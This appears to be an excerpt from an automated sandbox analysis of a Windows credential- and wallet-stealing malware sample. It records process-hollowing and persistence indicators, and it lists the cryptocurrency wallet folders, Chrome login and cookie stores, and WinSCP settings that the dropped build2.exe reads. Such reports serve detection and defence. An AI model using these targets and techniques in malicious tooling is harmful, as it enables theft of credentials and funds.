Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0041CCE2 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW, 0_2_0041CCE2
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00447CAC __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 1_2_00447CAC
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_004158F0 SetUnhandledExceptionFilter, 0_2_004158F0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0040F520 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0040F520
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0040E640 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0040E640
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0040DAA0 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040DAA0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_004329EC
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_004329BB SetUnhandledExceptionFilter, 1_2_004329BB

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\2OmglUwx83.exe Memory written: C:\Users\user\Desktop\2OmglUwx83.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\2OmglUwx83.exe Memory written: C:\Users\user\Desktop\2OmglUwx83.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Memory written: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Memory written: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Memory written: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_02290110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 0_2_02290110
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\Desktop\2OmglUwx83.exe "C:\Users\user\Desktop\2OmglUwx83.exe"
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\Desktop\2OmglUwx83.exe "C:\Users\user\Desktop\2OmglUwx83.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\Desktop\2OmglUwx83.exe "C:\Users\user\Desktop\2OmglUwx83.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe --Task
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe "C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe"
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe "C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe" --AutoStart
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Process created: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe "C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe"
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe "C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe" --AutoStart
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 1_2_00419F90
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: GetCursorInfo,CharUpperA,GetConsoleAliasesLengthW,GetDefaultCommConfigW,GetProfileSectionA,_puts,GetFileInformationByHandle,_realloc,_realloc,_realloc,_fseek,SetCalendarInfoA,SetCalendarInfoA,SetCurrentDirectoryW,BuildCommDCBAndTimeoutsW,CreateFileW,OpenJobObjectA,WriteConsoleOutputCharacterA,MapUserPhysicalPages,AddAtomA,GetThreadPriority,GetFullPathNameA,FindNextVolumeMountPointW,FillConsoleOutputCharacterA,EnumResourceNamesW,OpenWaitableTimerW,LocalSize,_hwrite,GetPrivateProfileStructA,GetComputerNameW,EnumDateFormatsExA,GetConsoleAliasesW,GetComputerNameW,GetConsoleTitleA,GetSystemWindowsDirectoryW,SetCalendarInfoA,GetFileAttributesA,HeapFree,lstrcpyW,LocalAlloc,GetConsoleFontSize,EnumDateFormatsA,ConvertThreadToFiber,InterlockedCompareExchange,VerifyVersionInfoA,FormatMessageW,SetCommState,FindResourceA,CreateMutexA,MoveFileA,LockFileEx,ResetEvent,FindNextFileW,GetComputerNameExA,CopyFileW,FileTimeToSystemTime,EnumSystemLocalesA,GetComputerNameW,WriteConsoleA,GlobalGetAtomNameW,LoadLibraryA,SetConsoleWindowInfo,GetCPInfoExW,EnumResourceLanguagesA,TerminateThread,GetDiskFreeSpaceExW,GetPrivateProfileStructW,GetConsoleAliasW,lstrcpyA,GetOEMCP,ExitThread, 0_2_00409909
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: GetLocaleInfoA, 0_2_004277E0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free, 1_2_0043404A
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 1_2_00438178
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 1_2_00440116
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, 1_2_004382A2
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 1_2_0043834F
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s, 1_2_00438423
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 1_2_004335E7
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: EnumSystemLocalesW, 1_2_004387C8
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: GetLocaleInfoW, 1_2_0043884E
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free, 1_2_00432B6D
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW, 1_2_00437BB3
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: EnumSystemLocalesW, 1_2_00437E27
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 1_2_00437E83
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 1_2_00437F00
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 1_2_0042BF17
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, 1_2_00437F83
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free, 1_2_00432FAD
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00427756 cpuid 1_2_00427756
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_00415910 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00415910
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 1_2_0042FE47
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 1_2_00419F90
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_00409605 GetComputerNameW,LoadLibraryA,LoadLibraryW,GetProcAddress,InterlockedExchangeAdd,VerifyVersionInfoW,GetTickCount,DebugBreak,GetConsoleAliasExesLengthW,GetPrivateProfileIntA,GetLastError,GetSystemWow64DirectoryW,IsDBCSLeadByte,CreateMailslotA,GetStartupInfoW,InterlockedExchangeAdd,_hwrite,HeapSize,VerifyVersionInfoW,InterlockedIncrement,InterlockedIncrement,AddAtomA,WriteProfileSectionW,GetConsoleAliasesLengthW,GetSystemDefaultLangID,CreateNamedPipeW,AbortSystemShutdownW,ImpersonateNamedPipeClient,LoadLibraryA,GetOverlappedResult,FindNextVolumeW,LeaveCriticalSection,GetModuleHandleW,FormatMessageW,CreateActCtxA,CopyFileW,GetConsoleTitleA,VerifyVersionInfoW,InterlockedIncrement,InterlockedExchangeAdd,InterlockedIncrement,GetCommandLineA,SetLastError,MoveFileWithProgressW,VerifyVersionInfoA, 0_2_00409605

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: build2.exe PID: 5652, type: MEMORYSTR
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets\default_wallet0
Source: build2.exe, 0000000D.00000002.620328877.00000000022CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.conf.jsonw
Source: build2.exe, 0000000D.00000002.618683629.0000000000705000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorageL
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ntdesk\AppData\Roaming\Ethereum\
Source: build2.exe, 0000000D.00000002.649603691.0000000026CD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: dus\exodus.w
Source: build2.exe, 0000000D.00000002.649603691.0000000026CD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: file__0.localstorage
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: oaming\MultiDoge\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: Yara match File source: 0000000D.00000002.615942779.0000000000648000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: Process Memory Space: build2.exe PID: 5652, type: MEMORYSTR